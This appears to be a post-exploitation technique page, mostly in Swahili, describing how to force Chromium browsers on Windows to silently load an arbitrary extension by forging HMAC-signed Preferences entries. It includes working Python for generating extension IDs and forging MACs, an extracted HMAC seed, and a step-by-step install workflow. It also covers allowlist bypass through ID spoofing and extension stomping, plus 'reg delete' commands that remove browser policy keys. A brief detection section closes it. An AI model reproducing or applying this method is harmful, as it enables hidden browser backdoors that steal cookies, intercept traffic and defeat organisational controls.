Forced Extension Load & Preferences MAC Forgery (Windows)

Reading time: 8 minutes

Muhtasari

Stealthy post-exploitation technique ya kulazimisha kupakia extensions yoyote kwenye vivinjari vinavyotegemea Chromium kwenye Windows kwa kuhariri Preferences/Secure Preferences za mtumiaji na kutengeneza HMACs halali kwa node zilizobadilishwa. Inafanya kazi dhidi ya Chrome/Chromium, Edge, na Brave. Imeonekana kutumika kuanzia Chromium 130 hadi 139 wakati wa uchapishaji. Disk write primitive rahisi katika profile ya mwathiriwa inatosha kuendelea kuweka extension yenye ruhusa kamili bila flags za command-line au taarifa kwa mtumiaji.

Wazo kuu: Chromium huhifadhi hali ya extension kwa kila mtumiaji katika faili ya JSON ya preferences na kuilinda kwa HMAC-SHA256. Ikiwa utahesabu MACs halali kwa kutumia browser’s embedded seed na kuyaandika kando ya node ulizozingiza, browser itayakubali na kuanzisha entry ya extension yako.

Wapi hali ya extension inakaa (Windows)

• Profaili ya Chrome isiyounganishwa na domain:
• %USERPROFILE%/AppData/Local/Google/Chrome/User Data/Default/Secure Preferences (includes a root "super_mac").
• Profaili ya Chrome iliyounganishwa na domain:
• %USERPROFILE%/AppData/Local/Google/Chrome/User Data/Default/Preferences
• Nodi muhimu zinazotumika na Chromium:
• extensions.settings.<extension_id> → embedded manifest/metadata for the extension entry
• protection.macs.extensions.settings.<extension_id> → HMAC for that JSON blob
• Chromium ≥134: extensions.ui.developer_mode (boolean) must be present and MAC‑signed for unpacked extensions to activate

Mchoro uliorahisishwa (ielekezi):

{
"extensions": {
"settings": {
"<extension_id>": {
"name": "Extension name",
"manifest_version": 3,
"version": "1.0",
"key": "<BASE64 DER SPKI>",
"path": "<absolute path if unpacked>",
"state": 1,
"from_bookmark": false,
"was_installed_by_default": false
// ...rest of manifest.json + required install metadata
}
},
"ui": { "developer_mode": true }
},
"protection": {
"macs": {
"extensions": {
"settings": { "<extension_id>": "<MAC>" },
"ui": { "developer_mode": "<MAC>" }
}
}
}
}

Vidokezo:

• Edge/Brave zinabaki na miundo sawa. Thamani ya protection seed inaweza kutofautiana (kwa baadhi ya builds ilionekana Edge/Brave zinatumia null au seed nyingine).

Extension IDs: path vs key na jinsi ya kuzifanya deterministic

Chromium hupata extension ID kama ifuatavyo:

• Extension iliyopakiwa/imesigned: ID = SHA‑256 over DER‑encoded SubjectPublicKeyInfo (SPKI) → take first 32 hex chars → map 0–f to a–p
• Isiyopakiwa (hakuna key katika manifest): ID = SHA‑256 over the absolute installation path bytes → map 0–f to a–p

Ili kuweka ID thabiti kwenye hosts mbalimbali, ingiza fixed base64 DER public key katika manifest.json chini ya "key". ID itatokana na key hii badala ya installation path.

Msaidizi wa kuzalisha deterministic ID na key pair:

import base64
import hashlib
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa

def translate_crx_id(s: str) -> str:
t = {'0':'a','1':'b','2':'c','3':'d','4':'e','5':'f','6':'g','7':'h','8':'i','9':'j','a':'k','b':'l','c':'m','d':'n','e':'o','f':'p'}
return ''.join(t.get(c, c) for c in s)

def generate_extension_keys() -> tuple[str,str,str]:
priv = rsa.generate_private_key(public_exponent=65537, key_size=2048)
pub = priv.public_key()
spki = pub.public_bytes(encoding=serialization.Encoding.DER,
format=serialization.PublicFormat.SubjectPublicKeyInfo)
crx_id = translate_crx_id(hashlib.sha256(spki).digest()[:16].hex())
pub_b64 = base64.b64encode(spki).decode('utf-8')
priv_der = priv.private_bytes(encoding=serialization.Encoding.DER,
format=serialization.PrivateFormat.TraditionalOpenSSL,
encryption_algorithm=serialization.NoEncryption())
priv_b64 = base64.b64encode(priv_der).decode('utf-8')
return crx_id, pub_b64, priv_b64

print(generate_extension_keys())

Ongeza public key iliyotengenezwa kwenye manifest.json yako ili kufunga ID:

{
"manifest_version": 3,
"name": "Synacktiv extension",
"version": "1.0",
"key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2lMCg6..."
}

Kuforgea integrity MACs za Mapendeleo (core bypass)

Chromium inalinda mapendeleo kwa HMAC‑SHA256 juu ya "path" + serialized JSON value ya kila node. Mbegu ya HMAC imejumuishwa ndani ya browser’s resources.pak na ilikuwa bado halali hadi Chromium 139.

Toa mbegu kwa kutumia GRIT pak_util na tafuta seed container (file id 146 katika builds zilizotestwa):

python3 pak_util.py extract resources.pak -o resources_v139/
python3 pak_util.py extract resources.pak -o resources_v139_dirty/
# compare a clean vs minimally modified resources.pak to spot the seed holder
xxd -p resources_v139/146
# e748f336d85ea5f9dcdf25d8f347a65b4cdf667600f02df6724a2af18a212d26b788a25086910cf3a90313696871f3dc05823730c91df8ba5c4fd9c884b505a8

Hesabu MACs (hex kwa herufi kubwa) kama:

ext_mac = HMAC_SHA256(seed,
"extensions.settings.<crx_id>" + json.dumps(<settings_json>))

devmode_mac = HMAC_SHA256(seed,
"extensions.ui.developer_mode" + ("true" or "false"))

Mfano mdogo wa Python:

import json, hmac, hashlib

def mac_upper(seed_hex: str, pref_path: str, value) -> str:
seed = bytes.fromhex(seed_hex)
# Compact JSON to match Chromium serialization closely
val = json.dumps(value, separators=(',', ':')) if not isinstance(value, str) else value
msg = (pref_path + val).encode('utf-8')
return hmac.new(seed, msg, hashlib.sha256).hexdigest().upper()

# Example usage
settings_path = f"extensions.settings.{crx_id}"
devmode_path = "extensions.ui.developer_mode"
ext_mac = mac_upper(seed_hex, settings_path, settings_json)
devmode_mac = mac_upper(seed_hex, devmode_path, "true")

Weka thamani zifuatazo chini ya:

• protection.macs.extensions.settings.<crx_id> = ext_mac
• protection.macs.extensions.ui.developer_mode = devmode_mac (Chromium ≥134)

Tofauti za vivinjari: kwenye Microsoft Edge na Brave seed inaweza kuwa null/tofauti. Muundo wa HMAC unabaki ule ule; rekebisha seed ipasavyo.

Vidokezo vya utekelezaji

• Tumia serialization sawa kabisa ya JSON ambayo Chromium inatumia wakati wa kuhesabu MACs (JSON compact bila whitespace ni salama kwa vitendo; kupanga keys kunaweza kusaidia kuepuka matatizo ya mpangilio).
• Hakikisha extensions.ui.developer_mode ipo na imesainiwa kwenye Chromium ≥134, la sivyo entry yako isiyofungwa haitafanya kazi.

Mtiririko wa upakaji kimya kutoka mwanzo hadi mwisho (Windows)

1. Tengeneza ID inayotarajiwa na weka "key" ndani ya manifest.json; andaa extension ya MV3 isiyofungwa (unpacked) na ruhusa zinazotarajiwa (service worker/content scripts)
2. Tengeneza extensions.settings. kwa kuingiza manifest na metadata ya chini ya usakinishaji inayohitajika na Chromium (state, path for unpacked, n.k.)
3. Chimba HMAC seed kutoka resources.pak (file 146) na hesabu MACs mbili: moja kwa settings node na moja kwa extensions.ui.developer_mode (Chromium ≥134)
4. Andika nodes zilizotengenezwa na MACs ndani ya target profile’s Preferences/Secure Preferences; uzinduzi ujao utaamilisha extension yako kwa njia ya otomatiki na ruhusa zote zilizotangazwa

Kupita vidhibiti vya shirika

• Whitelisted extension hash spoofing (ID spoofing)

1. Sakinisha extension ya Web Store iliyoruhusiwa na kumbuka ID yake
2. Pata public key yake (km. kupitia chrome.runtime.getManifest().key katika background/service worker au kwa kuchukua/kuchambua .crx yake)
3. Weka key hiyo kama manifest.key katika extension yako iliyorekebishwa ili kuzalisha ID ile ile
4. Sajili entry ndani ya Preferences na saini MACs → Uhakiki wa ExtensionInstallAllowlist unaotegemea ID pekee hupitwa

• Extension stomping (ID collision precedence)

• Ikiwa local unpacked extension ina ID ile ile na extension ya Web Store iliyosakinishwa, Chromium hupendelea ile isiyofungwa (unpacked). Hii kwa vitendo inaibadilisha extension halali kwenye chrome://extensions huku ikihifadhi ID inayotambulika. Imethibitishwa kwenye Chrome na Edge (mfano, Adobe PDF)

• Kuzima GPO kupitia HKCU (inahitaji admin)

• Chrome/Edge policies zipo chini ya HKCU\Software\Policies*

• Kwa haki za admin, futa/rekebisha policy keys kabla ya kuandika entries zako ili kuepuka vizuizi:

reg delete "HKCU\Software\Policies\Google\Chrome\ExtensionInstallAllowlist" /f
reg delete "HKCU\Software\Policies\Google\Chrome\ExtensionInstallBlocklist" /f

Njia mbadala inayosababisha kelele: command-line loading

Kuanzia Chromium ≥137, --load-extension inahitaji pia kupitisha:

--disable-features=DisableLoadExtensionCommandLineSwitch

Mbinu hii inajulikana sana na inafuatiliwa (kwa mfano, na EDR/DFIR; hutumika pia na commodity malware kama Chromeloader). Preference MAC forging inaficha zaidi.

Related flags and more cross‑platform tricks are discussed here:

macOS Chromium Injection

Athari za kiutendaji

Mara ikikubaliwa, extension inaendesha kwa ruhusa zake zilizotangazwa, ikimaanisha DOM access, request interception/redirects, cookie/storage access, and screenshot capture—effectively in‑browser code execution and durable user‑profile persistence. Utekelezaji wa mbali kupitia SMB au njia nyingine ni rahisi kwa sababu uanzishaji unatokana na data kupitia Preferences.

Utambuzi na kuimarisha

• Fuatilia michakato isiyo ya Chromium inayoweka data kwenye Preferences/Secure Preferences, hasa nodes mpya chini ya extensions.settings zinazoambatanishwa na protection.macs entries
• Toa tahadhari kwa kubadili bila kutegemewa kwa extensions.ui.developer_mode na kwa HMAC‑valid lakini unapproved extension entries
• Kagua HKCU/HKLM Software\Policies kwa ajili ya udanganyifu; tekeleza policies kupitia device management/Chrome Browser Cloud Management
• Toa kipaumbele kwa forced‑install kutoka store na verified publishers badala ya allowlists zinazolingana kwa extension ID pekee

References

• The Phantom Extension: Backdooring chrome through uncharted pathways
• pak_util.py (GRIT)
• SecurePreferencesFile (prior research on HMAC seed)
• CursedChrome